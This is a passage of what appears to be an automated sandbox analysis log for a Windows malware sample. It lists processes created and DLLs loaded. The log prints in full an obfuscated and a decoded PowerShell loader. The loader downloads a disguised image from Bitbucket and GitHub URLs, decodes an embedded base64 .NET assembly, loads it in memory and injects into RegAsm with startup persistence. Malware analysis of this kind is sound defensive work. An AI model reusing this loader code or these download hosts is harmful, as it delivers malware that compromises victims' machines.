s#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.60op/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\OTO2wVGgkl.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c 123.vbs
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\123.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#G
s#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#CJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.60op/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeSection loaded: cabinet.dllJump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeSection loaded: feclient.dllJump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeSection loaded: advpack.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mscoree.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: amsi.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: gpapi.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dwrite.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: textshaping.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
